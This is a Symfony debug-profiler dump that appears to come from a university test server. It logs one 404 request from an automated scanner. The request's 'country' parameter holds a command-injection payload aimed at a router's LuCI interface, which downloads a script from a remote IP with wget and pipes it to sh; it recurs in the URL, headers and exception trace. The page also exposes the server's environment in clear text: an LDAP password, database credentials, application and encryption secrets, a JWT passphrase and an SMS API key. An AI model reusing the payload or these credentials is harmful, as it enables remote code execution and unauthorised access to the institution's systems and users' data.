https://preferences-test.univ-cotedazur.fr/cgi-bin/luci/;stok=/locale?country=%24%28id%3E%60wget%20-O-%20http%3A%2F%2F154.216.17.169%2Ft%7Csh%3B%60%29&form=country&operation=write

Forwarded to
ErrorController (b9c8df)
Method
GET
HTTP Status
404
IP
95.214.55.43
Profiled on
Token
a458d0

n/a

Request

GET Parameters

Key Value
country 
"$(id>`wget -O- http://154.216.17.169/t|sh;`)"
form 
"country"
operation 
"write"

POST Parameters

No POST parameters

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_links 
Fig\Link\GenericLinkProvider {#1188
  -links: [
    "00000000000004a30000000000000000" => Fig\Link\Link {#1187
      -href: "https://preferences-test.univ-cotedazur.fr/api/docs.jsonld"
      -rel: [
        "http://www.w3.org/ns/hydra/core#apiDocumentation" => true
      ]
      -attributes: []
    }
  ]
}
_remove_csp_headers 
true
_stopwatch_token 
"e03279"

Request Headers

Header Value
host 
"preferences-test.univ-cotedazur.fr"
referer 
"http://134.59.204.17:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.169%2Ft%7Csh%3B%60)"
user-agent 
"Go-http-client/1.1"
x-php-ob-level 
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=UTF-8"
date 
"Thu, 19 Sep 2024 18:24:31 GMT"
link 
"<https://preferences-test.univ-cotedazur.fr/api/docs.jsonld>; rel="http://www.w3.org/ns/hydra/core#apiDocumentation""
x-debug-exception 
"No%20route%20found%20for%20%22GET%20https%3A%2F%2Fpreferences-test.univ-cotedazur.fr%2Fcgi-bin%2Fluci%2F%3Bstok%3D%2Flocale%22%20%28from%20%22http%3A%2F%2F134.59.204.17%3A80%2Fcgi-bin%2Fluci%2F%3Bstok%3D%2Flocale%3Fform%3Dcountry%26operation%3Dwrite%26country%3D%24%28id%253E%2560wget%2B-O-%2Bhttp%253A%252F%252F154.216.17.169%252Ft%257Csh%253B%2560%29%22%29"
x-debug-exception-file 
"%2Fweb%2Fhtml%2Fpreferences-test.univ-cotedazur.fr%2Fv2.0.0%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135"
x-debug-token 
"a458d0"
x-debug-token-link 
"https://preferences-test.univ-cotedazur.fr/_profiler/b9c8df"
x-previous-debug-token 
"b9c8df"
x-robots-tag 
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
API_LDAP_BASE_URI 
"https://api-ldap.univ-cotedazur.fr"
API_LDAP_GROUP_ATTRIBUTE_MEMBER 
"member"
API_LDAP_GROUP_ATTRIBUTE_NAME 
"cn"
API_LDAP_GROUP_DN 
"ou=groups,dc=unice,dc=fr"
API_LDAP_PASSWORD 
"4jcBHpnuC9"
API_LDAP_USERNAME 
"preferences"
API_LDAP_USER_ATTRIBUTE_CIVILITY 
"supannCivilite"
API_LDAP_USER_ATTRIBUTE_EMAIL 
"mail"
API_LDAP_USER_ATTRIBUTE_EMPLOYEE_ID 
"supannEmpId"
API_LDAP_USER_ATTRIBUTE_FIRSTNAME 
"givenName"
API_LDAP_USER_ATTRIBUTE_ID 
"uid"
API_LDAP_USER_ATTRIBUTE_LASTNAME 
"sn"
API_LDAP_USER_ATTRIBUTE_PASSWORD 
"userPassword"
API_LDAP_USER_ATTRIBUTE_RED_LIST 
"supannListeRouge"
API_LDAP_USER_ATTRIBUTE_USERNAME 
"supannAliasLogin"
API_LDAP_USER_DN 
"ou=personnel,ou=people,dc=unice,dc=fr"
APP_ENV 
"dev"
APP_SECRET 
"0bc6c102bd1717e66248b9fdddf4cd5b"
CACHE_LIFE_TIME 
"120"
CAS_LOGIN_URL 
"https://login.unice.fr/login"
CAS_LOGOUT_URL 
"https://login.unice.fr/logout"
CAS_NAMESPACE 
"cas"
CAS_OPTIONS 
"[]"
CAS_QUERY_SERVICE_PARAMETER 
"service"
CAS_QUERY_TICKET_PARAMETER 
"ticket"
CAS_USERNAME_ATTRIBUTE 
"user"
CAS_USER_ATTRIBUTE_CIVILITY 
"supanncivilite"
CAS_USER_ATTRIBUTE_FIRSTNAME 
"givenname"
CAS_USER_ATTRIBUTE_GROUPS 
"memberof"
CAS_USER_ATTRIBUTE_LASTNAME 
"sn"
CAS_USER_ATTRIBUTE_MAIL 
"mail"
CAS_USER_ATTRIBUTE_PHONE 
"phoneNumber"
CAS_USER_ATTRIBUTE_RED_LIST 
"supannListeRouge"
CAS_VALIDATION_URL 
"https://login.unice.fr/p3/serviceValidate"
DATABASE_APP_URL 
"mysql://preference_test:Preference@2019@mysql2.prive.unice.fr:3306/preference_test?serverVersion=mariadb-10.3.13"
ENCRYPTOR_SECRET 
"42AD18CAEB517C4389829F3F72D84733B3D7FAE39E45811D3763EA545DE977D1A478AE38653EB74351E7C8A7CA8FC5D2B1727FBF2974"
JWT_PASSPHRASE 
"SyllApi2020"
JWT_PUBLIC_KEY 
"%kernel.project_dir%/config/jwt/public.pem"
JWT_SECRET_KEY 
"%kernel.project_dir%/config/jwt/private.pem"
LINK_FOOTER_LEGAL_NOTICE 
""
LINK_NAVBAR_BRAND 
""
MAILER_DSN 
"smtp://smtp.unice.fr"
MAILER_SOURCE 
"no-reply@univ-cotedazur.fr"
SMS_API_KEY 
"1cb0c8e4f02ebcb"
SMS_API_LOGIN 
"dsiunice"
SMS_API_SIMULATE 
"false"
SMS_SENDER 
"UCA"
USER_CHANGE_PASSWORD_GROUPS_RESTRICTION 
"["cn=application.messagerie.utilisateurs-locaux,ou=groups,dc=unice,dc=fr"]"
VALIDATION_TOKEN_DURATION 
"2"
VALIDATION_TOKEN_LENGTH 
"6"

Defined as regular env variables

Key Value
APP_DEBUG 
"1"
CONTEXT_DOCUMENT_ROOT 
"/web/html/preferences-test.univ-cotedazur.fr/current/public"
CONTEXT_PREFIX 
""
DOCUMENT_ROOT 
"/web/html/preferences-test.univ-cotedazur.fr/current/public"
GATEWAY_INTERFACE 
"CGI/1.1"
HTTPS 
"on"
HTTP_HOST 
"preferences-test.univ-cotedazur.fr"
HTTP_REFERER 
"http://134.59.204.17:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.169%2Ft%7Csh%3B%60)"
HTTP_USER_AGENT 
"Go-http-client/1.1"
LD_LIBRARY_PATH 
"/opt/oracle/instantclient_19_21"
PATH 
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
PHP_SELF 
"/index.php"
QUERY_STRING 
"form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.169%2Ft%7Csh%3B%60)"
REDIRECT_HTTPS 
"on"
REDIRECT_QUERY_STRING 
"form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.169%2Ft%7Csh%3B%60)"
REDIRECT_SSL_TLS_SNI 
"preferences-test.univ-cotedazur.fr"
REDIRECT_STATUS 
"200"
REDIRECT_URL 
"/cgi-bin/luci/;stok=/locale"
REMOTE_ADDR 
"95.214.55.43"
REMOTE_PORT 
"34624"
REQUEST_METHOD 
"GET"
REQUEST_SCHEME 
"https"
REQUEST_TIME 
1726770271
REQUEST_TIME_FLOAT 
1726770271.0424
REQUEST_URI 
"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.169%2Ft%7Csh%3B%60)"
SCRIPT_FILENAME 
"/web/html/preferences-test.univ-cotedazur.fr/current/public/index.php"
SCRIPT_NAME 
"/index.php"
SERVER_ADDR 
"134.59.204.100"
SERVER_ADMIN 
"[no address given]"
SERVER_NAME 
"preferences-test.univ-cotedazur.fr"
SERVER_PORT 
"443"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SIGNATURE 
"<address>Apache/2.4.41 (Ubuntu) Server at preferences-test.univ-cotedazur.fr Port 443</address>\n"
SERVER_SOFTWARE 
"Apache/2.4.41 (Ubuntu)"
SSL_TLS_SNI 
"preferences-test.univ-cotedazur.fr"
SYMFONY_DOTENV_VARS 
"APP_ENV,APP_SECRET,DATABASE_APP_URL,ENCRYPTOR_SECRET,MAILER_DSN,MAILER_SOURCE,SMS_API_LOGIN,SMS_API_KEY,SMS_SENDER,SMS_API_SIMULATE,API_LDAP_BASE_URI,API_LDAP_USERNAME,API_LDAP_PASSWORD,API_LDAP_USER_DN,API_LDAP_USER_ATTRIBUTE_ID,API_LDAP_USER_ATTRIBUTE_EMPLOYEE_ID,API_LDAP_USER_ATTRIBUTE_USERNAME,API_LDAP_USER_ATTRIBUTE_CIVILITY,API_LDAP_USER_ATTRIBUTE_LASTNAME,API_LDAP_USER_ATTRIBUTE_FIRSTNAME,API_LDAP_USER_ATTRIBUTE_EMAIL,API_LDAP_USER_ATTRIBUTE_RED_LIST,API_LDAP_USER_ATTRIBUTE_PASSWORD,API_LDAP_GROUP_DN,API_LDAP_GROUP_ATTRIBUTE_MEMBER,API_LDAP_GROUP_ATTRIBUTE_NAME,CACHE_LIFE_TIME,CAS_LOGIN_URL,CAS_VALIDATION_URL,CAS_LOGOUT_URL,CAS_NAMESPACE,CAS_USERNAME_ATTRIBUTE,CAS_QUERY_SERVICE_PARAMETER,CAS_QUERY_TICKET_PARAMETER,CAS_OPTIONS,CAS_USER_ATTRIBUTE_CIVILITY,CAS_USER_ATTRIBUTE_LASTNAME,CAS_USER_ATTRIBUTE_FIRSTNAME,CAS_USER_ATTRIBUTE_MAIL,CAS_USER_ATTRIBUTE_PHONE,CAS_USER_ATTRIBUTE_RED_LIST,CAS_USER_ATTRIBUTE_GROUPS,LINK_NAVBAR_BRAND,LINK_FOOTER_LEGAL_NOTICE,USER_CHANGE_PASSWORD_GROUPS_RESTRICTION,VALIDATION_TOKEN_LENGTH,VALIDATION_TOKEN_DURATION,JWT_SECRET_KEY,JWT_PUBLIC_KEY,JWT_PASSPHRASE"

Sub Requests 1

ErrorController (token = b9c8df)

Key Value
_controller 
"error_controller"
_links 
Fig\Link\GenericLinkProvider {#866
  -links: [
    "00000000000003610000000000000000" => Fig\Link\Link {#865
      -href: "https://preferences-test.univ-cotedazur.fr/api/docs.jsonld"
      -rel: [
        "http://www.w3.org/ns/hydra/core#apiDocumentation" => true
      ]
      -attributes: []
    }
  ]
}
_stopwatch_token 
"244891"
exception 
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#511
  #message: "No route found for "GET https://preferences-test.univ-cotedazur.fr/cgi-bin/luci/;stok=/locale" (from "http://134.59.204.17:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.169%2Ft%7Csh%3B%60)")"
  #code: 0
  #file: "/web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 135
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#481 …}
  -statusCode: 404
  -headers: []
  trace: {
    /web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/symfony/http-kernel/EventListener/RouterListener.php:135 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:117 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);}
    /web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/symfony/http-kernel/HttpKernel.php:128 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/symfony/http-kernel/HttpKernel.php:74 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
    }
    /web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
    }
    /web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/autoload_runtime.php:35 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /web/html/preferences-test.univ-cotedazur.fr/v2.0.0/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/web/html/preferences-test.univ-cotedazur.fr/v2.0.0/vendor/autoload_runtime.php"
      }
    }
  }
}
logger 
Symfony\Bridge\Monolog\Logger {#139 …6}